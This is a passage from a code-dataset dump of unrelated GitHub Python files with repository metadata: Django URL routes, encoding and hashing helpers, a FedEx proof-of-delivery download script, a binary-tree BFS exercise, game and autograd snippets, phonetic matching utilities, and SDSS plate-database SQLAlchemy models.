name='pageSignOut'),\n url(r'^post/add/$', 'postAdd', name='pagePostAdd'),\n url(r'^category/add/$', 'categoryAdd', name='pageCategoryAdd'),\n url(r'^comment/add/(?P[\\w-]+).html$', 'commentAdd', name='pageCommentAdd'),\n url(r'^deleteAccount/$', 'deleteAccount', name='pageDeleteAccount'),\n url(r'^confirmMail/(?P\\w+)$', 'confirmMail', name='pageConfirmMail'),\n url(r'^confirmCommentWithMail/(?P\\w+)/(?P\\w+)/(?P\\w+)$',\n 'confirmCommentWithMail', name='pageConfirmCommentWithMail'),\n)\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"berkantaydin/trainingProject","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9734083398","text":"import hashlib\nimport html\nimport json\nimport urllib\nimport base64\n\nimport requests\nfrom django.db.models import ManyToManyField, DateField, TimeField, DateTimeField\n\n\n\nclass toDictRoot:\n '''\n model转字典基类\n '''\n def toDICT(self, fields=None, exclude=None):\n data = {}\n for f in self._meta.concrete_fields + self._meta.many_to_many:\n value = f.value_from_object(self)\n if fields and f.name not in fields:\n continue\n if exclude and f.name in exclude:\n continue\n if isinstance(f, ManyToManyField):\n value = [i.id for i in value] if self.pk else None\n\n if isinstance(f, DateTimeField):\n value = value.strftime('%Y-%m-%d %H:%M:%S.%f') if value else None\n elif isinstance(f, TimeField):\n value = value.strftime('%H:%M:%S.%f') if value else None\n elif isinstance(f, DateField):\n value = value.strftime('%Y-%m-%d') if value else None\n\n data[f.name] = value\n return data\n\n def toJSON(self, fields=None, exclude=None):\n return json.dumps(self.toDICT(fields=fields, exclude=exclude), separators=(',', ':'))\n\n\ndef send_msg(phone, msg, url):\n '''\n 发送短信\n :param phone:手机号\n :param msg:短信内容\n :param url:发送短信地址\n :return:\n '''\n try:\n msg = urlencode(msg)\n url = url.format(phone, msg)\n res = requests.get(url)\n json_response = json.loads(res.content)\n # 设置验证码\n if json_response.get('result') == 'success':\n return True\n else:\n return False\n except Exception as e:\n raise Exception\n\n\ndef sort_dict_to_list(data):\n '''\n 将字典按字母序排序\n :param data:\n :return: 元素为(key, value)元组的列表\n '''\n if data is None or len(data)==0:\n raise ValueError\n\n if not isinstance(data, dict):\n raise TypeError\n\n complex_keys = [k for k, v in data.items() if isinstance(v, dict)]\n\n # 将字典类型的数据dump出来\n for key in complex_keys:\n data[key] = json.dumps(data[key], separators=(',', ':'))\n\n return sorted([(k, v) for k, v in data.items()])\n\n\ndef md5_hexdigest(encry=None, upper=False):\n '''\n 16 进制 32 位 加密\n :param encry: 要加密的字符串\n :param upper: 是要大写\n :return:\n '''\n if encry is None:\n raise ValueError\n\n if not isinstance(encry, str):\n raise TypeError\n\n m = hashlib.md5(encry.encode(encoding='utf-8'))\n if not upper:\n return m.hexdigest()\n else:\n return m.hexdigest().upper()\n\n\ndef md5_digest(encry=None):\n '''\n 2 进制 16 位 加密\n :param encry: 要加密的字符串\n :return:\n '''\n if encry is None:\n raise ValueError\n\n if not isinstance(encry, str):\n raise TypeError\n\n m = hashlib.md5(encry.encode(encoding='utf-8'))\n return m.digest().decode().encode('utf-8')\n\n\ndef xor_decrypt(tips, key='9'):\n '''\n 异或解密\n :param tips: 密文\n :param key: 秘钥\n :return:\n '''\n lkey = len(key)\n secret = []\n num = 0\n for each in tips:\n if num >= lkey:\n num = num % lkey\n secret.append(ord(chr(ord(each) ^ ord(key[num]))))\n num += 1\n result = ''.join([str(i) for i in secret])\n return result\n\n\ndef urldecode(b):\n '''\n url解码\n :param b:\n :return:\n '''\n if b is None:\n raise ValueError\n\n if not isinstance(b, bytes):\n raise TypeError\n\n data = urllib.parse.unquote(b)\n return data\n\n\ndef urlencode(s):\n '''\n url编码\n :param s:\n :return:\n '''\n if s is None:\n raise ValueError\n\n if type(s) not in [str, bytes]:\n raise TypeError\n data = urllib.parse.quote(s)\n return data\n\n\ndef base64encode(b):\n '''\n base64编码\n :param b:\n :return:\n '''\n if b is None:\n ValueError\n\n if not isinstance(b, bytes):\n raise TypeError\n\n return base64.b64encode(b)\n\n\ndef base64decode(s):\n '''\n base64 解码\n :param s:\n :return:\n '''\n if s is None:\n raise ValueError\n\n if type(s) not in [str, bytes]:\n raise TypeError\n\n s = str(base64.urlsafe_b64decode(s), encoding='utf8')\n s = html.unescape(s) # 反转义html字符\n return s\n\n\n\n","repo_name":"wucong1994/Desktop","sub_path":"desktopfile/snowland_sdk/encode_encrypt.py","file_name":"encode_encrypt.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29551184276","text":"'''\nSave FedEx Proof of Delivery PDF for a given tracking number\n'''\n\nimport requests\nimport json\n\n# find the line containing \"getSpodImage\" in main to see where the POST request is made.\n# find \"WTRK_ENDPOINTS\" to see capabilities of the api.\n\n# note that www is required for application/x-www-form-urlencoded request!\n# without www only responds to the request as query parameters\n# trkcUrl = 'https://fedex.com/trackingCal/track'\ntrkcUrl = 'https://www.fedex.com/trackingCal/track'\n\n# test how requests sends the payload with netcat\n# nc -kl 8265\n# trkcUrl = 'http://localhost:8265'\n\ntrackingNumber = \"282309656732\"\n\nTrackPackagesRequest = {\n \"TrackPackagesRequest\": {\n \"appDeviceType\":\"DESKTOP\",\n \"appType\":\"WTRK\",\n \"processingParameters\":{},\n \"uniqueKey\":\"\",\n \"supportCurrentLocation\":True,\n \"supportHTML\":True,\n \"trackingInfoList\":[{\n \"trackNumberInfo\":{\n \"trackingNumber\": trackingNumber,\n \"trackingQualifier\":None,\n \"trackingCarrier\":None\n }\n }]\n }\n }\n\npayload = {\n \"action\": \"trackpackages\",\n \"data\": json.dumps(TrackPackagesRequest),\n \"format\": \"json\",\n \"locale\": \"en_US\",\n \"version\": \"1\"\n}\n\n# headers not necessary but can change if you want\n# headers = {\n# \"user-agent\": \"my-app/0.0.1\"\n# }\n\nr = requests.post(trkcUrl, data=payload)\n\nTrackPackagesResponse = json.loads(r.text)\n\n# TrackPackagesResponse contains full tracking history\n# print(json.dumps(TrackPackagesResponse, indent=2))\n\nif TrackPackagesResponse[\"TrackPackagesResponse\"][\"successful\"]:\n trackingNbr = TrackPackagesResponse[\"TrackPackagesResponse\"][\"packageList\"][0][\"trackingNbr\"]\n trackingQualifier = TrackPackagesResponse[\"TrackPackagesResponse\"][\"packageList\"][0][\"trackingQualifier\"]\n trackingCarrierCd = TrackPackagesResponse[\"TrackPackagesResponse\"][\"packageList\"][0][\"trackingCarrierCd\"]\n\n retrievePDFUrl = \"https://www.fedex.com/trackingCal/retrievePDF.jsp\"\n\n payload = {\n \"accountNbr\":None,\n \"anon\":True,\n \"appType\":None,\n \"destCountry\":None,\n \"locale\":\"en_US\",\n \"shipDate\":None,\n \"trackingCarrier\":trackingCarrierCd,\n \"trackingNumber\":trackingNbr,\n \"trackingQualifier\":trackingQualifier,\n \"type\":\"SPOD\"\n }\n\n r = requests.get(retrievePDFUrl, params=payload)\n\n filename = \"SPOD_\" + trackingNbr + \".pdf\"\n\n open(filename, 'wb').write(r.content)\n","repo_name":"graciedevine/fedex_tracker","sub_path":"brian/spod.py","file_name":"spod.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72101358187","text":"\"\"\"\nGiven a binary tree, find its minimum depth.\nThe minimum depth is the number of nodes along the shortest path from the root node down to the nearest leaf node.\nNote: A leaf is a node with no children.\n\"\"\"\n\nfrom typing import Optional\nfrom typing import List\nfrom collections import deque\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def minDepth(self, root: Optional[TreeNode]) -> int:\n if not root:\n return 0\n count = 0\n queue = deque()\n \n queue.append(root)\n\n while queue:\n level_size = len(queue)\n count += 1\n print(\"queue: {}\".format(queue))\n for i in range(level_size):\n curr = queue.popleft()\n if not curr.left and not curr.right:\n return count\n \n if curr.left:\n queue.append(curr.left)\n if curr.right:\n queue.append(curr.right)\n return count\n\n\nnode1 = TreeNode(3)\nnode2 = TreeNode(9)\nnode3 = TreeNode(20)\nnode4 = TreeNode(15)\nnode5 = TreeNode(7)\n\nnode1.left = node2\nnode1.right = node3\nnode3.left = node4\nnode3.right = node5\n\n# node1 = TreeNode(-9)\n# node2 = TreeNode()\n\ns = Solution()\nresult = s.minDepth(node1)\nprint(\"result: {}\".format(result))","repo_name":"davidyoon891122/LeetCode","sub_path":"MinimumDepthOfBinaryTree/minimum_depth_of_binary_tree_bfs.py","file_name":"minimum_depth_of_binary_tree_bfs.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27167416478","text":"from nano_grad.engine.tensor import Tensor\nfrom nano_grad.engine.matrix import Matrix\nimport numpy as np\n\ndef ReLU(x):\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n x.data[i][j]=x.data[i][j].relu()\n return x\n\n# e_x = np.exp(x - np.max(x))\n# softmax = e_x / e_x.sum()\n# log_softmax = np.log(softmax)\ndef Softmax(x):\n prob=[]\n averaged=x-Matrix.max(x)\n e_x=Matrix.exp(averaged)\n summed__e_x= Matrix.sum(e_x)\n softmax=e_x / summed__e_x\n return softmax","repo_name":"mrbraden56/NanoGrad","sub_path":"nano_grad/nn/activation.py","file_name":"activation.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6649465682","text":"import fuzzy\nfrom num2words import num2words\n\n\ndmeta = fuzzy.DMetaphone()\n\n\ndef s_phonetic(word):\n \"\"\"\n Safe word compare function, performing some cleansing\n \"\"\"\n word = word.strip()\n if word.isnumeric():\n word = num2words(word)\n return dmeta(word)\n\n\ndef wcmp(a, b):\n return s_phonetic(a) == s_phonetic(b)\n\n\ndef wil(word, lst):\n \"\"\"\n Check if a word is found in a list\n\n :param word: The word to check\n :param lst: The list to check\n :returns: Boolean\n \"\"\"\n w = s_phonetic(word)\n for i in lst:\n if w == s_phonetic(i):\n return True\n\n return False\n\n\ndef wis(word, sentence):\n \"\"\"\n Check if a word is found in a string\n\n :param word: The word to check\n :param lst: The sentence to check\n :returns: Boolean\n \"\"\"\n w = s_phonetic(word)\n for i in sentence.split(' '):\n if w == s_phonetic(i):\n return True\n\n return False\n\n\ndef awis(words, sentence):\n \"\"\"\n Check if any of the words is found in a sentence\n\n :param words: The words to check\n :param lst: The sentence to check\n :returns: Boolean\n \"\"\"\n ws = []\n for word in words:\n ws.append(s_phonetic(word))\n\n for i in sentence.split(' '):\n if s_phonetic(i) in ws:\n return True\n\n return False\n\n\ndef cwis(words, sentence):\n \"\"\"\n Count how many of the words are found in a sentence\n\n :param words: The words to check\n :param lst: The sentence to check\n :returns: Count of matches\n \"\"\"\n ws = []\n for word in words:\n ws.append(s_phonetic(word))\n\n count = 0\n # pad \".\" with extra spaces, so it's considered\n sentence = sentence.replace('.', ' . ')\n for i in sentence.split(' '):\n if s_phonetic(i) in ws:\n count += 1\n\n return count\n","repo_name":"JaykeMeijer/jarvis","sub_path":"listen/phonetics.py","file_name":"phonetics.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21914435520","text":"from picowork.pspriteobject import *\nfrom picowork.psprite import *\nfrom picowork.pinput import *\nfrom worldobject import *\n\nclass Portal(WorldObject):\n sprites = None\n\n def __init__(self, tile_map, portal_callback):\n super().__init__(tile_map)\n self.collision_tag = 'portal'\n self.collision_bounds = (-0.5, -0.25, 0.5, 0.75)\n\n if Portal.sprites is None:\n image = get_image('portal_stripes3.png')\n Portal.sprites = [PSprite(image, (i % 2) * 512, (i // 2) * 512, 512, 512) for i in range(4)]\n\n self.visual = PSpriteObject(Portal.sprites[2])\n self.visual.set_position(Vector2(0, 0.25))\n self.visual.set_scale(Vector2(0.1, 0.1))\n self.add_element(self.visual)\n\n self.indicator = PSpriteObject('thin_btn_up.png')\n self.indicator.set_position(Vector2(0, 1.2))\n self.indicator.set_scale(Vector2(1, 0))\n self.add_element(self.indicator)\n\n self.portal_callback = portal_callback\n self.near = False\n\n def update(self, delta_time):\n super().update(delta_time)\n\n self.visual.set_rotation(self.time * -360)\n self.indicator.set_position(Vector2(0, sin(self.time * 10) * 0.05 + 1.2))\n\n near = len(self.get_parent().get_collision_objects_from_object('player', self)) > 0\n if near and not self.near:\n self.indicator.set_scale(Vector2(1, 2))\n self.indicator.set_scale(lerp(self.indicator.get_scale(), Vector2(1, 1) if near else Vector2(1, 0), delta_time * 24))\n if near and get_keydown(SDLK_w):\n sound = get_sound('Psychic_Soothe_Pulser_01a.wav')\n sound.set_volume(50)\n sound.play()\n self.portal_callback()\n self.near = near\n","repo_name":"Yupdown/2DGameProgramming","sub_path":"source/portal.py","file_name":"portal.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12365347247","text":"arr = [2,23,43,22,100,108,554,556]\nn = 108\nc = 0\nfor i in arr:\n if (i == n):\n print (\" This algorithm ran the loop for \", c ,\" times before finding the element in the array size of \", len(arr))\n break\n c+=1\n\n\n \n","repo_name":"sivasrlingala/CodingPrograms","sub_path":"linearsearch.py","file_name":"linearsearch.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4701919132","text":"from django.urls import path\nfrom .views import(\n PostListView,\n PostDetailView,\n PostCreateView,\n PostDeleteView,\n PostUpdateView\n)\nfrom django.conf.urls.static import static\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom . import views\n# from django.conf import settings\n\n\nurlpatterns = [\n path('',PostListView.as_view() , name=\"post_list\"),\n path('/', PostDetailView.as_view(), name=\"post_detail\"),\n path('new/', PostCreateView.as_view(), name=\"post_new\"),\n path('/delete/', PostDeleteView.as_view(), name=\"post_delete\"),\n path('/edit/', PostUpdateView.as_view(), name=\"post_edit\"),\n\n]","repo_name":"Carlos-Castellanos/blog113","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13092599418","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# @Author: Demitri Muna\n# @Filename: platedb.py\n# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)\n\nimport datetime\nimport math\nimport warnings\nfrom decimal import Decimal\nfrom textwrap import TextWrapper\n\nimport sqlalchemy\nfrom sqlalchemy import func\nfrom sqlalchemy.ext.declarative import AbstractConcreteBase, declared_attr\nfrom sqlalchemy.orm import relation\nfrom sqlalchemy.orm.exc import MultipleResultsFound, NoResultFound\nfrom sqlalchemy.orm.session import Session\n\nfrom sdssdb.sqlalchemy.operationsdb import OperationsBase, database\n\nfrom .tools import convert\nfrom .tools.moon import Moon\n\n\napo_lat = 32.7802778 # Latitude at APO\napo_lon = 105.820278 # Longitude at APO\n\n\nwarnings.filterwarnings('ignore', '.*Skipped unsupported reflection.*')\nwarnings.filterwarnings('ignore', '.*Did not recognize type*')\n\n\nclass Base(AbstractConcreteBase, OperationsBase):\n __abstract__ = True\n _schema = 'platedb'\n _relations = 'define_relations'\n\n @declared_attr\n def __table_args__(cls):\n return {'schema': cls._schema}\n\n\nclass PluggingException(Exception):\n \"\"\"Custom class for plugging exceptions. Adds contact information.\"\"\"\n\n def __init__(self, message, *args):\n\n tw = TextWrapper()\n tw.width = 79\n tw.subsequent_indent = ''\n tw.break_on_hyphens = False\n\n # Adds custom error\n message += '\\n\\n'\n message += '*' * 79 + '\\n'\n\n addenda = ('If you are not sure of how to solve this problem '\n 'please copy this error message and email to Jose '\n 'Sanchez-Gallego and Drew '\n 'Chojnowski and CC Demitri Muna '\n ' and John Parejko '\n '.\\n')\n addenda = '\\n'.join(tw.wrap(addenda))\n message += addenda + '\\n'\n\n message += '*' * 79 + '\\n'\n\n super(PluggingException, self).__init__(message)\n\n\nclass ActivePluggingException(PluggingException):\n \"\"\"Custom class for problems with Active Pluggings.\"\"\"\n\n pass\n\n\nclass Cartridge(Base):\n\n __tablename__ = 'cartridge'\n\n def __repr__(self):\n return '' % self.number\n\n\nclass Constants(Base):\n\n __tablename__ = 'constants'\n\n def __repr__(self):\n return ''\n\n\nclass Gprobe(Base):\n\n __tablename__ = 'gprobe'\n\n def __repr__(self):\n return f''\n\n\nclass Plugging(Base):\n\n __tablename__ = 'plugging'\n\n def __repr__(self):\n return f''\n\n @property\n def fscan_datetime(self):\n return convert.mjd2datetime(self.fscan_mjd)\n\n def scienceExposures(self):\n session = Session.object_session(self)\n return session.query(Exposure).join(Observation, ExposureFlavor).filter(\n Observation.plugging_pk == self.pk).filter(\n ExposureFlavor.label == 'Science').all()\n\n def getSumSn2(self, cameras=None):\n session = Session.object_session(self)\n if cameras is None:\n cameras = ['r1', 'r2', 'b1', 'b2']\n exposures = session.query(Exposure).join(Observation).filter(\n Observation.plugging == self).all()\n SumSn2 = [0, 0, 0, 0]\n for i, camName in enumerate(cameras):\n camera = session.query(Camera).filter_by(label=camName).one()\n for exposure in exposures:\n cframe = session.query(CameraFrame).filter_by(\n exposure=exposure).filter_by(\n camera=camera).one()\n if cframe.sn2 > 0.2:\n SumSn2[i] = SumSn2[i] + cframe.sn2\n return SumSn2\n\n def percentDone(self):\n if len(self.activePlugging) > 0:\n session = Session.object_session(self)\n\n # Refresh observations to ensure they are in sync with DB\n r1_sum = float(sum([obs.sumOfCamera('r1') for obs in self.observations]))\n r2_sum = float(sum([obs.sumOfCamera('r2') for obs in self.observations]))\n b1_sum = float(sum([obs.sumOfCamera('b1') for obs in self.observations]))\n b2_sum = float(sum([obs.sumOfCamera('b2') for obs in self.observations]))\n\n min_r_percent = min([r1_sum, r2_sum]) / float(\n session.query(BossSN2Threshold).join(Camera).filter(\n Camera.label == 'r1').one().sn2_threshold) * 100.0\n min_b_percent = min([b1_sum, b2_sum]) / float(\n session.query(BossSN2Threshold).join(Camera).filter(\n Camera.label == 'b1').one().sn2_threshold) * 100.0\n\n percent_done = min([min_r_percent, min_b_percent])\n\n if percent_done > 100.0:\n percent_done = 100.0\n\n return percent_done\n else:\n return 0\n\n def updateStatus(self):\n session = Session.object_session(self)\n\n cameras = ['r1', 'r2', 'b1', 'b2']\n\n exposureExcellent = 1\n # exposureBad = 2\n # exposureTest = 3\n # exposureText = ['', 'Excellent', 'Bad', 'Test']\n\n # flagAuto = session.query(PluggingStatus).filter_by(pk=0).one()\n flagGood = session.query(PluggingStatus).filter_by(pk=1).one()\n flagIncomplete = session.query(PluggingStatus).filter_by(pk=2).one()\n flagOverGood = session.query(PluggingStatus).filter_by(pk=3).one()\n flagOverIncomplete = session.query(PluggingStatus).filter_by(pk=4).one()\n\n # If plugging status is overwritten, nothing for us to calculate\n if self.status == flagOverGood or self.status == flagOverIncomplete:\n return 0\n\n exposures = session.query(Exposure).join(Observation).filter(\n Observation.plugging == self).all()\n\n for camName in cameras:\n try:\n camera = session.query(Camera).filter_by(label=camName).one()\n sn2Thresh = session.query(BossSN2Threshold).filter_by(camera=camera).one()\n\n sumsn2 = 0.0\n goodExposures = 0\n for exposure in exposures:\n if exposure.status.pk != exposureExcellent:\n continue\n else:\n goodExposures += 1\n\n try:\n cframe = session.query(CameraFrame).filter_by(\n exposure=exposure).filter_by(camera=camera).one()\n\n sn2 = cframe.sn2\n if sn2 > sn2Thresh.sn2_min:\n sumsn2 += float(sn2)\n except sqlalchemy.orm.exc.MultipleResultsFound:\n print('More than one CameraFrame found. '\n 'Expecting only one! \\n\\n')\n raise\n except (sqlalchemy.orm.exc.NoResultFound, KeyError):\n print('!WARNING: Could not get sn2 from platedb')\n pass\n except:\n print('Problem loading CameraFrame \\n\\n')\n raise\n\n # Not enough sn2, plugging is incomplete\n if sumsn2 < float(sn2Thresh.sn2_threshold):\n # Set the plugging status to incomplete\n self.status = flagIncomplete\n session.flush()\n return\n\n # Not enough exposures, plugging is incomplete\n if goodExposures < float(sn2Thresh.min_exposures):\n # Set the plugging status to incomplete\n self.status = flagIncomplete\n session.flush()\n return\n\n except:\n print('Problem calculating sumsn2')\n raise\n\n # Set the plugging status to complete\n self.status = flagGood\n session.flush()\n\n return\n\n def mangaUpdateStatus(self, status):\n \"\"\"Update the plugging status of manga exposures, based on Totoro.\"\"\"\n\n session = Session.object_session(self)\n\n flagGood = session.query(PluggingStatus).filter_by(pk=1).one()\n flagIncomplete = session.query(PluggingStatus).filter_by(pk=2).one()\n\n if status:\n self.status = flagGood\n else:\n self.status = flagIncomplete\n\n def makeActive(self):\n \"\"\"Makes the plugging active.\"\"\"\n\n session = Session.object_session(self)\n\n cartNo = self.cartridge.number\n\n # Checks if the plate has already an active plugging\n platePK = self.plate.pk\n activePluggings = session.query(ActivePlugging).all()\n\n for aP in activePluggings:\n if aP.plugging.plate.pk == platePK and aP.plugging_pk != self.pk:\n warnings.warn(\n 'plate {0} is already loaded in cart {1} with a '\n 'different plugging. Removing previous active '\n 'plugging'.format(self.plate.plate_id,\n aP.plugging.cartridge.number), UserWarning)\n session.delete(aP)\n\n # Checks if the plugging is already active\n try:\n activePlugging = session.query(ActivePlugging).filter(\n ActivePlugging.plugging_pk == self.pk).one()\n except MultipleResultsFound:\n raise ActivePluggingException(\n 'more than one active plugging for plugging pk={0}. '\n 'This should never happen!'.format(self.pk))\n except NoResultFound:\n activePlugging = None\n\n # If plugging is already active, checks the cart number\n if activePlugging is not None:\n if activePlugging.pk != cartNo:\n raise ActivePluggingException(\n 'plugging pk={0} is already active but its cart number '\n 'does not match the one in the plugging ({1}!={2}). This '\n 'should never happen.'.format(self.pk, activePlugging.pk, cartNo))\n\n warnings.warn('plugging pk={0} is already active. '\n 'Not doing anything.'.format(self.pk), UserWarning)\n return activePlugging\n\n # Makes the plugging active\n activePlugging = session.query(ActivePlugging).get(cartNo)\n if activePlugging is not None:\n activePlugging.plugging_pk = self.pk\n session.flush()\n else:\n session.add(ActivePlugging(pk=cartNo, plugging_pk=self.pk))\n session.flush()\n\n # Check that it worked\n # Checks if the plugging is already active\n try:\n activePlugging = session.query(ActivePlugging).filter(\n ActivePlugging.plugging_pk == self.pk).one()\n except NoResultFound:\n raise ActivePluggingException(\n 'something went wrong when trying to make plugging pk={0} '\n 'active'.format(self.pk))\n\n return activePlugging\n\n\nclass ActivePlugging(Base):\n\n __tablename__ = 'active_plugging'\n\n def __repr__(self):\n return (f'')\n\n\nclass PlPlugMapM(Base):\n\n __tablename__ = 'pl_plugmap_m'\n\n def platePointing(self):\n # Class method that returns the session this object is in.\n session = Session.object_session(self)\n try:\n pp = session.query(PlatePointing).join(Plate, Plugging).filter(\n Plate.pk == self.plugging.plate.pk).filter(\n PlatePointing.pointing_name == self.pointing_name).one()\n except sqlalchemy.orm.exc.NoResultFound:\n print(f'A plate pointing for a plugmap (pk={self.pk}) '\n f'could not be found (plate id={self.plugging.plate.plate_id}, '\n f'pk={self.plugging.plate.pk})')\n pp = None\n return pp\n\n def visibility(self):\n \"\"\"Retrieves the visiblity range for this plate\n as a map with keys \"ha_observable_min\" and \"ha_observable_max\".\n Each value is an array of values corresponding to each pointing.\n \"\"\"\n\n max_found = False\n min_found = False\n\n visibilities = dict()\n\n # Just loop over every line in the \"file\" until the two keys are found.\n # They're near the top, so it won't take long.\n for line in self.file.split('\\n'):\n if line[0:17] == 'ha_observable_min':\n min_found = True\n visibilities['ha_observable_min'] = [float(x) for x in line[17:].split()]\n elif line[0:17] == 'ha_observable_max':\n visibilities['ha_observable_max'] = [float(x) for x in line[17:].split()]\n max_found = True\n\n if min_found and max_found:\n break\n\n return visibilities\n\n def __repr__(self):\n return f''\n\n\nclass Plate(Base):\n __tablename__ = 'plate'\n\n def __repr__(self):\n return f''\n\n def calculatedCompletionStatus(self):\n \"\"\"Determine whether the plate is done from the pluggings on that plate.\"\"\"\n\n if True not in ['boss' in survey.label.lower() for survey in self.surveys]:\n return 'n/a'\n\n if self.completionStatus.pk == 0: # pk = 0 -> \"Automatic\"\n return self._automaticCompletionStatus()\n else:\n # If the status is \"Force Complete\" or \"Force Incomplete\",\n # return that status\n return self.completionStatus.label\n\n def _automaticCompletionStatus(self):\n \"\"\"If the plate completion status were automatic, is it complete or incomplete.\"\"\"\n\n if True not in ['boss' in survey.label.lower() for survey in self.surveys]:\n return 'n/a'\n\n session = Session.object_session(self)\n plug_statuses = session.query(PluggingStatus.label).join(\n Plugging, Plate).filter(Plate.plate_id == self.plate_id).all()\n\n for status in [a[0] for a in plug_statuses]:\n if 'Good' in status:\n return 'Complete'\n\n return 'Incomplete'\n\n @property\n def firstPointing(self):\n return self.design.pointings[0]\n\n \"\"\"\n # LEFT OFF HERE!\n def tilePlatesRecalculate(self, old_completion_status_pk, new_completion_status_pk):\n session = Session.object_session(self)\n if (old_completion_status_pk == 0 and new_completion_status_pk == 3 and\n self._automaticCompletionStatus() == 'Complete'):\n\n # Changing from Automatic (complete) to Force Incomplete\n\n # If the most recent entry in completion_status_history is by 'platedb'\n # and is 'Do Not Observe,' change the completion_status back to whatever\n # the entry before that one is.\n\n if len(self.completionStatusHistory) > 0:\n try:\n mostRecentChange = self.completionStatusHistory[-1]\n if mostRecentChange.first_name == 'platedb':\n prevStatus_pk = self.completionStatusHistory[-2].plate_completion_status_pk\n previousStatus = session.query(PlateCompletionStatus).filter(\n PlateCompletionStatus.pk == prevStatus_pk).one()\n except IndexError:\n # This could happen if the plate's completion status was only changed once from\n # automatic -> do not observe by the script. In that case, the completion\n # status should go back to automatic\n previousStatus = session.query(PlateCompletionStatus).filter(\n PlateCompletionStatus.pk == 0).one() # Automatic\n self.completionStatus = previousStatus\n session.flush()\n \"\"\"\n\n\nclass Survey(Base):\n\n __tablename__ = 'survey'\n\n def display_string(self):\n if self.label is None:\n return self.plateplan_name\n else:\n return self.label\n\n def __repr__(self):\n return f''\n\n\nclass PlateRun(Base):\n\n __tablename__ = 'plate_run'\n\n def __repr__(self):\n return f''\n\n\nclass PlateLocation(Base):\n\n __tablename__ = 'plate_location'\n\n\nclass PlateStatus(Base):\n\n __tablename__ = 'plate_status'\n\n def __repr__(self):\n return f''\n\n\nclass PlateToPlateStatus(Base):\n\n __tablename__ = 'plate_to_plate_status'\n\n\nclass PlateCompletionStatus(Base):\n\n __tablename__ = 'plate_completion_status'\n\n\nclass PlateCompletionStatusHistory(Base):\n\n __tablename__ = 'plate_completion_status_history'\n\n\nclass Tile(Base):\n\n __tablename__ = 'tile'\n\n def __repr__(self):\n return f''\n\n def calculatedCompletionStatus(self):\n \"\"\"Determine whether the tile is done.\"\"\"\n\n if self.status.pk == 0:\n plates = self.plates\n\n for plate in plates:\n if 'Complete' in plate.calculatedCompletionStatus():\n return 'Complete'\n else:\n pass\n\n return 'Incomplete'\n else:\n return self.status.label\n\n\nclass TileStatus(Base):\n\n __tablename__ = 'tile_status'\n\n\nclass TileStatusHistory(Base):\n\n __tablename__ = 'tile_status_history'\n\n\nclass PlateToSurvey(Base):\n\n __tablename__ = 'plate_to_survey'\n\n\nclass DesignValue(Base):\n\n __tablename__ = 'design_value'\n\n\nclass DesignField(Base):\n\n __tablename__ = 'design_field'\n\n\nclass Design(Base):\n\n __tablename__ = 'design'\n\n def __repr__(self):\n return f''\n\n @property\n def designDictionary(self):\n \"\"\"Returns dictionary of key value pairs, as strings.\"\"\"\n\n dv = {}\n for v in self.values:\n dv[v.field.label.lower()] = v.value\n\n return dv\n\n def no_science_targets(self):\n \"\"\"Returns the number of science targets as a list for each pointing.\"\"\"\n\n session = Session.object_session(\n self) # class method that returns the session this object is in\n\n try:\n design_values = session.query(DesignValue).join(\n Design, DesignField).filter(DesignValue.design == self).filter(\n DesignField.label.ilike('n%_science')).all()\n\n # create a list, initialized to 0, with the number of pointings\n science_targets = [0] * len(design_values[0].value.split())\n\n for design_value in design_values:\n for idx, value in enumerate(design_value.value.split()):\n science_targets[idx] = science_targets[idx] + int(value)\n return science_targets\n except:\n return [0]\n\n def getDesignId(self):\n \"\"\"Returns the designID of the plate, given the plate object.\"\"\"\n\n session = Session.object_session(self)\n try:\n designId = session.query(DesignValue).join(\n Design, DesignField).filter(\n DesignValue.design == self).filter(\n DesignField.label.ilike('designid')).one()\n designId = designId.value\n return designId\n except:\n return -1\n\n def numPlates(self):\n \"\"\"Returns the number of plates in a design, given the design object.\"\"\"\n\n session = Session.object_session(self)\n try:\n numPlate = session.query(Plate).join(Design).filter(Plate.design == self).count()\n return numPlate\n except:\n return -1\n\n def numObservations(self):\n \"\"\"Returns the number of observations for a design, given the design object.\"\"\"\n\n session = Session.object_session(self)\n try:\n numObs = session.query(Observation).join(\n Plugging, Plate, Design).filter(Design.pk == self.pk).count()\n return numObs\n except:\n return -1\n\n def getRa(self):\n \"\"\"Returns the ra and dec for a design, given the design object.\"\"\"\n\n session = Session.object_session(self)\n try:\n ra = session.query(DesignValue).join(Design, DesignField).filter(\n DesignValue.design == self).filter(\n DesignField.label.ilike('racen')).one()\n ra = ra.value\n return ra\n except:\n return -1\n\n def getDec(self):\n \"\"\"Returns the ra and dec for a design, given the design object.\"\"\"\n\n session = Session.object_session(self)\n try:\n dec = session.query(DesignValue).join(Design, DesignField).filter(\n DesignValue.design == self).filter(\n 